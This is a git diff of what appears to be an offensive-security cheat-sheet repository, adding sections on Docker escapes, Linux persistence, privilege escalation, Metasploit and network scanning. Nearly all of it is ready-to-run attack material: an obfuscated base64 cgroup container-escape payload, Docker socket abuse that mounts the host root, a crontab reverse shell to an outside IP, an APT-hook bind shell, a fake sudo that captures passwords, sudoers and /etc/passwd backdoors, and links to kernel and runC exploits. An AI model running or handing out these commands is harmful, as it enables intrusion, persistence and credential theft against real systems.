+- [Open Docker API Port](#open-docker-api-port)
+- [Insecure Docker Registry](#insecure-docker-registry)
+- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
+- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
+- [References](#references)
+
+## Tools
+
+* Dockscan : https://github.com/kost/dockscan
+    ```powershell
+    dockscan unix:///var/run/docker.sock
+    dockscan -r html -o myreport -v tcp://example.com:5422
+    ```
+
+## Mounted Docker Socket
+
+Prerequisite:
+* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"`
+
+Usually found in `/var/run/docker.sock`, for example for Portainer.
+
+```powershell
+curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json
+curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
+curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
+```
+
+
+## Open Docker API Port
+
+Prerequisite:
+* Docker runned with `-H tcp://0.0.0.0:XXXX`
+
+```powershell
+$ nmap -sCV 10.10.10.10 -p 2376
+2376/tcp open  docker  Docker 19.03.5
+| docker-version:
+|   Version: 19.03.5
+|   MinAPIVersion: 1.12
+```
+
+Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`.
+
+```powershell
+$ export DOCKER_HOST=tcp://10.10.10.10:2376
+$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0  -t ubuntu bash
+or
+$ docker -H  open.docker.socket:2375 ps
+$ docker -H  open.docker.socket:2375 exec -it mysql /bin/bash
+or 
+$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq
+$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
+```
+
+From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`.
+
+
+## Insecure Docker Registry
+
+Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`.
+
+```powershell
+curl https://registry.example.com/v2/<image_name>/tags/list
+docker pull https://registry.example.com:443/<image_name>:<tag>
+
+# connect to the endpoint and list image blobs
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest
+# download blobs
+curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz
+# automated download
+https://github.com/NotSoSecure/docker_fetch/
+python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local
+```
+
+Access a private registry and start a container with one of its image
+
+```powershell
+docker login -u admin -p admin docker.registry.local
+docker pull docker.registry.local/wordpress-image
+docker run -it docker.registry.local/wordpress-image /bin/bash
+```
+
+Access a private registry using OAuth Token from Google
+
+```powershell
+curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email
+curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token 
+docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
+```
+
+## Exploit privileged container abusing the Linux cgroup v1
+
+Prerequisite (at least one): 
+ * `--privileged`
+ * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags.
+
+```powershell
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -'
+```
+
+Exploit breakdown :
+
+```powershell
+# On the host
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
+ 
+# In the container
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+ 
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+ 
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+ 
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+```
+
+## Breaking out of Docker via runC
+
+> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to.  - Vulnerability overview by the runC team
+
+Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736
+
+```powershell
+$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
+$ docker run --rm cve-2019-5736:malicious_image_POC
+```
+
+## References
+
+- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
+- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
+- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
+- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
+- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
+- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
\ No newline at end of file
diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md
index a80c802f..7007e2c2 100644
--- a/Methodology and Resources/Linux - Persistence.md	
+++ b/Methodology and Resources/Linux - Persistence.md	
@@ -1,5 +1,21 @@
 # Linux - Persistence
 
+## Summary
+
+* [Basic reverse shell](#basic-reverse-shell)
+* [Add a root user](#add-a-root-user)
+* [Suid Binary](#suid-binary)
+* [Crontab - Reverse shell](#crontab-reverse-shell)
+* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
+* [Backdooring a startup service](#backdoor-a-startup-service)
+* [Backdooring a user startup file](#backdooring-an-user-startup-file)
+* [Backdooring a driver](#backdooring-a-driver)
+* [Backdooring the APT](#backdooring-the-apt)
+* [Backdooring the SSH](#backdooring-the-ssh)
+* [Tips](#tips)
+* [References](#references)
+
+
 ## Basic reverse shell
 
 ```bash
@@ -8,6 +24,14 @@ ncat --sctp -lvp 4242
 ncat --tcp -lvp 4242
 ```
 
+## Add a root user
+
+```powershell
+sudo useradd -ou 0 -g 0 john
+sudo passwd john
+echo "linuxpassword" | passwd --stdin john
+```
+
 ## Suid Binary
 
 ```powershell
@@ -19,13 +43,15 @@ chown root:root $TMPDIR2/croissant
 chmod 4777 $TMPDIR2/croissant
 ```
 
-## Crontab (Reverse shell to 192.168.1.2 on port 4242)
+## Crontab - Reverse shell
 
 ```bash
 (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
 ```
 
-## Backdooring an user's bash_rc (FR/EN Version)
+## Backdooring a user's bash_rc 
+
+(FR/EN Version)
 
 ```bash
 TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
@@ -41,6 +67,26 @@ fi
 rm /tmp/$TMPNAME2
 ```
 
+or add the following line inside its .bashrc file.
+
+```powershell
+$ chmod u+x ~/.hidden/fakesudo
+$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
+```
+
+and create the `fakesudo` script.
+
+```powershell
+read -sp "[sudo] password for $USER: " sudopass
+echo ""
+sleep 2
+echo "Sorry, try again."
+echo $sudopass >> /tmp/pass.txt
+
+/usr/bin/sudo $@
+```
+
+
 ## Backdooring a startup service
 
 ```bash
@@ -48,7 +94,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
 sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 ```
 
-## Backdooring an user startup file
+## Backdooring a user startup file
 
 Linux, write a file in  `~/.config/autostart/NAME_OF_FILE.desktop`
 
@@ -79,14 +125,28 @@ Next time "apt-get update" is done, your CMD will be executed!
 echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
 ```
 
+## Backdooring the SSH
+
+Add an ssh key into the `~/.ssh` folder.
+
+1. `ssh-keygen`
+2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
+3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
+
 ## Tips
 
 Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
 
-```bash
+```powershell
 ## Do not remove. Generated from /etc/issue.conf by configure.
 ```
 
+Hide in plain sight using zero width spaces in filename.
+
+```powershell
+touch $(echo -n 'index\u200D.php') index.php
+```
+
 Clear the last line of the history.
 
 ```bash
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index bcf6af3e..26847cba 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -1,20 +1,12 @@
 # Linux - Privilege Escalation
 
-## Tools
-
-- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
-    ```powershell
-    ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
-    ```
-- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
-- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
-- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
-
 ## Summary
 
-* [Checklist](#checklist)
+* [Tools](#tools)
+* [Checklist](#checklists)
 * [Looting for passwords](#looting-for-passwords)
     * [Files containing passwords](#files-containing-passwords)
+    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
     * [Last edited files](#last-edited-files)
     * [In memory passwords](#in-memory-passwords)
     * [Find sensitive files](#find-sensitive-files)
@@ -30,12 +22,14 @@
     * [Interesting capabilities](#interesting-capabilities)
 * [SUDO](#sudo)
     * [NOPASSWD](#nopasswd)
-    * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
+    * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
     * [Doas](#doas)
     * [sudo_inject](#sudo-inject)
 * [GTFOBins](#gtfobins)
 * [Wildcard](#wildcard)
-* [Writable /etc/passwd](#writable---etc---passwd)
+* [Writable files](#writable-files)
+    * [Writable /etc/passwd](#writable-etcpasswd)
+    * [Writable /etc/sudoers](#writable-etcsudoers)
 * [NFS Root Squashing](#nfs-root-squashing)
 * [Shared Library](#shared-library)
     * [ldconfig](#ldconfig)
@@ -43,6 +37,35 @@
 * [Groups](#groups)
     * [Docker](#docker)
     * [LXC/LXD](#lxclxd)
+* [Kernel Exploits](#kernel-exploits)
+    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
+
+
+## Tools
+
+- [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration)
+
+    ```powershell
+    wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
+    curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh
+    ./lse.sh -l1 # shows interesting information that should help you to privesc
+    ./lse.sh -l2 # dump all the information it gathers about the system
+    ```
+
+- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
+    
+    ```powershell
+    ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
+    ```
+
+- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
+- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker)
+- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
+- [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER)
+
 
 ## Checklists
 
@@ -64,7 +87,7 @@
   * Checks if password hashes are stored in /etc/passwd
   * Extract full details for 'default' uid's such as 0, 1000, 1001 etc
   * Attempt to read restricted files i.e. /etc/shadow
-  * List current users history files (i.e .bash_history, .nano_history etc.)
+  * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
   * Basic SSH checks
 * Privileged access:
   * Which users have recently used sudo
@@ -126,6 +149,13 @@ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 ```
 
+### Old passwords in /etc/security/opasswd
+
+The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
+
+:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes 
+
+
 ### Last edited files
 
 Files that were edited in the last 10 minutes
@@ -172,13 +202,29 @@ Check inside the file, to find other paths with write permissions.
 /etc/cron.weekly
 /etc/sudoers
 /etc/exports
-/etc/at.allow
-/etc/at.deny
 /etc/anacrontab
 /var/spool/cron
 /var/spool/cron/crontabs/root
+
+crontab -l
+ls -alh /var/spool/cron;
+ls -al /etc/ | grep cron
+ls -al /etc/cron*
+cat /etc/cron*
+cat /etc/at.allow
+cat /etc/at.deny
+cat /etc/cron.allow
+cat /etc/cron.deny*
 ```
 
+You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job.
+
+```powershell
+# print both commands and file system events and scan procfs every 1000 ms (=1sec)
+./pspy64 -pf -i 1000 
+```
+
+
 ## Systemd timers
 
 ```powershell
@@ -205,6 +251,7 @@ SUID/Setuid stands for "set user ID upon execution", it is enabled by default in
 
 ```bash
 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
+find / -uid 0 -perm -4000 -type f 2>/dev/null
 ```
 
 ### Create a SUID binary
@@ -265,7 +312,26 @@ sh-5.0# id
 uid=0(root) gid=1000(swissky)
 ```
 
+| Capabilities name  | Description |
+|---|---|
+| CAP_AUDIT_CONTROL  | Allow to enable/disable kernel auditing |
+| CAP_AUDIT_WRITE  | Helps to write records to kernel auditing log |
+| CAP_BLOCK_SUSPEND  | This feature can block system suspends   |
+| CAP_CHOWN  | Allow user to make arbitrary change to files UIDs and GIDs |
+| CAP_DAC_OVERRIDE  | This helps to bypass file read, write and execute permission checks |
+| CAP_DAC_READ_SEARCH  | This only bypass file and directory read/execute permission checks  |
+| CAP_FOWNER  | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file  |
+| CAP_KILL  | Allow the sending of signals to processes belonging to others  |
+| CAP_SETGID  | Allow changing of the GID  |
+| CAP_SETUID  | Allow changing of the UID  |
+| CAP_SETPCAP  | Helps to transferring and removal of current set to any PID |
+| CAP_IPC_LOCK  | This helps to lock memory  |
+| CAP_MAC_ADMIN  | Allow MAC configuration or state changes  |
+| CAP_NET_RAW  | Use RAW and PACKET sockets |
+| CAP_NET_BIND_SERVICE  | SERVICE Bind a socket to internet domain privileged ports  |
+
 ## SUDO
+Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
 
 ### NOPASSWD
 
@@ -293,7 +359,7 @@ If `LD_PRELOAD` is explicitly defined in the sudoers file
 Defaults        env_keep += LD_PRELOAD
 ```
 
-Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
+Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
 
 ```powershell
 #include <stdio.h>
@@ -307,7 +373,7 @@ void _init() {
 }
 ```
 
-Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
+Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=<full_path_to_so_file> <program>`, e.g: `sudo LD_PRELOAD=/tmp/shell.so find`
 
 ### Doas
 
@@ -363,10 +429,19 @@ tar cf archive.tar *
 
 Tool: [wildpwn](https://github.com/localh0t/wildpwn)
 
+## Writable files
 
-## Writable /etc/passwd
+List world writable files on the system.
 
-First generate a password with one of the following commands
+```powershell
+find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
+find / -perm -2 -type f 2>/dev/null
+find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
+```
+
+### Writable /etc/passwd
+
+First generate a password with one of the following commands.
 
 ```powershell
 openssl passwd -1 -salt hacker hacker
@@ -384,17 +459,39 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
 You can now use the `su` command with `hacker:hacker`
 
+Alternatively you can use the following lines to add a dummy user without a password.    
+WARNING: you might degrade the current security of the machine.
+
+```powershell
+echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
+su - dummy
+```
+
+NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. 
+
+### Writable /etc/sudoers
+
+```powershell
+echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
+
+# use SUDO without password
+echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
+echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
+```
 
 ## NFS Root Squashing
 
-When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
+When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it.
 
 ```powershell
+# remote check the name of the folder
+showmount -e 10.10.10.10
+
 # create dir
 mkdir /tmp/nfsdir  
 
 # mount directory 
-mount -t nfs 10.10.10.10:/shared /tmp/nfsdir 
+mount -t nfs 10.10.10.10:/shared /tmp/nfsdir    
 cd /tmp/nfsdir
 
 # copy wanted shell 
@@ -475,6 +572,12 @@ $> docker run -it --rm -v $PWD:/mnt bash
 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
 ```
 
+Almost similar but you will also see all processes running on the host and be connected to the same NICs.
+
+```powershell
+docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
+```
+
 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
 
 ```powershell
@@ -495,6 +598,13 @@ sh-5.0# id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 
+More docker privilege escalation using the Docker Socket.
+
+```powershell
+sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
+sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
+```
+
 ### LXC/LXD
 
 The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
@@ -526,6 +636,53 @@ lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 
+Alternatively https://github.com/initstring/lxd_root
+
+## Kernel Exploits
+
+Precompiled exploits can be found inside these repositories, run them at your own risk !
+* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
+* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
+
+The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
+
+### CVE-2016-5195 (DirtyCow)
+
+Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
+
+```powershell
+# make dirtycow stable
+echo 0 > /proc/sys/vm/dirty_writeback_centisecs
+g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
+https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
+https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
+```
+
+### CVE-2010-3904 (RDS)
+
+Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
+
+```powershell
+https://www.exploit-db.com/exploits/15285/
+```
+
+### CVE-2010-4258 (Full Nelson)
+
+Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
+
+```powershell
+https://www.exploit-db.com/exploits/15704/
+```
+
+### CVE-2012-0056 (Mempodipper)
+
+Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
+
+```powershell
+https://www.exploit-db.com/exploits/18411
+```
+
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
@@ -537,4 +694,6 @@ lxc exec mycontainer /bin/sh
 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
-- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
\ No newline at end of file
+- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
+* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md
index c7b99804..3fb5bad8 100644
--- a/Methodology and Resources/Metasploit - Cheatsheet.md	
+++ b/Methodology and Resources/Metasploit - Cheatsheet.md	
@@ -10,6 +10,7 @@
     * [Meterpreter Webdelivery](#meterpreter-webdelivery)
     * [Get System](#get-system)
     * [Persistence Startup](#persistence-startup)
+    * [Network Monitoring](#network-monitoring)
     * [Portforward](#portforward)
     * [Upload / Download](#upload---download)
     * [Execute from Memory](#execute-from-memory)
@@ -58,7 +59,9 @@ set PAYLOAD generic/shell_reverse_tcp
 set LHOST 0.0.0.0
 set LPORT 4444
 set ExitOnSession false
-exploit -j
+
+generate -o /tmp/meterpreter.exe -f exe
+to_handler
 
 [ctrl+a] + [d]
 ```
@@ -128,6 +131,16 @@ OPTIONS:
 meterpreter > run persistence -U -p 4242
 ```
 
+### Network Monitoring
+
+```powershell
+# list interfaces
+run packetrecorder -li
+
+# record interface n°1
+run packetrecorder -i 1
+```
+
 ### Portforward
 
 ```powershell
diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology and enumeration.md
similarity index 97%
rename from Methodology and Resources/Methodology_and_enumeration.md
rename to Methodology and Resources/Methodology and enumeration.md
index 65cd22d2..8270db14 100644
--- a/Methodology and Resources/Methodology_and_enumeration.md	
+++ b/Methodology and Resources/Methodology and enumeration.md	
@@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
   index: 0x8 Account: root Name: root Desc: (null)
   ```  
 
+* Zone Transfer
+
+  ```powershell
+  host -t ns domain.local
+  domain.local name server master.domain.local.
+
+  host master.domain.local        
+  master.domain.local has address 192.168.1.1
+ 
+  dig axfr domain.local @192.168.1.1
+  ```
+
 ## List all the subdirectories and files
 
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md
index 1a0b9768..bf050ed0 100644
--- a/Methodology and Resources/Network Discovery.md	
+++ b/Methodology and Resources/Network Discovery.md	
@@ -3,6 +3,7 @@
 ## Summary
 
 - [Nmap](#nmap)
+- [Spyse](#spyse)
 - [Masscan](#masscan)
 - [Netdiscover](#netdiscover)
 - [Responder](#responder)
@@ -97,11 +98,54 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 
+## Spyse
+* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)
+
+* [Spyse Wrapper](https://github.com/zeropwn/spyse.py)
+
+#### Searching for subdomains
+```bash
+spyse -target xbox.com --subdomains
+```
+
+#### Reverse IP Lookup
+```bash
+spyse -target 52.14.144.171 --domains-on-ip
+```
+
+#### Searching for SSL certificates
+```bash
+spyse -target hotmail.com --ssl-certificates
+```
+```bash
+spyse -target "org: Microsoft" --ssl-certificates
+```
+#### Getting all DNS records
+```bash
+spyse -target xbox.com --dns-all
+```
+
 ## Masscan
 
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
+
+# find machines on the network
+sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
+cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst
+
+# find open ports for one machine
+sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
+
+
+# TCP grab banners and services informations
+TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
+[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP
+
+# UDP grab banners and services informations
+UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
+[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
 ```
 
 ## Reconnoitre
@@ -154,4 +198,4 @@ bettercap -X --proxy --proxy-https -T <target IP>
 
 ## References
 
-* [TODO](TODO)
\ No newline at end of file
+* [TODO](TODO)
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 227d80a7..2fa5a502 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -1,5 +1,27 @@
 # Network Pivoting Techniques
 
+## Summary
+
+* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding)
+* [SSH](#ssh)
+  * [SOCKS Proxy](#socks-proxy)
+  * [Local Port Forwarding](#local-port-forwarding)
